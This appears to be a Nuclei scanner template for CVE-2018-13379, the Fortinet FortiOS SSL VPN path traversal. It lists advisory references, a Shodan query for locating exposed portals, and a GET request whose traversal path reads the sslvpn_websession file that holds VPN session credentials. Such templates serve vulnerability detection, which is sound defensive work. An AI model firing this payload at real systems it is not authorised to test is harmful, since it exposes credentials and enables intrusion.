id: CVE-2018-13379 info: name: Fortinet FortiOS - Credentials Disclosure author: organiccrap severity: critical description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal). reference: - https://fortiguard.com/advisory/FG-IR-18-384 - https://www.fortiguard.com/psirt/FG-IR-20-233 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-13379 cwe-id: CWE-22 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* epss-score: 0.975 metadata: max-request: 1 verified: true shodan-query: http.html:"/remote/login" "xxxxxxxx" tags: cve,cve2018,fortios,lfi,kev http: - method: GET path: - "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" matchers: - type: regex part: body regex: - '^var fgt_lang =' # Enhanced by mp on 2022/05/12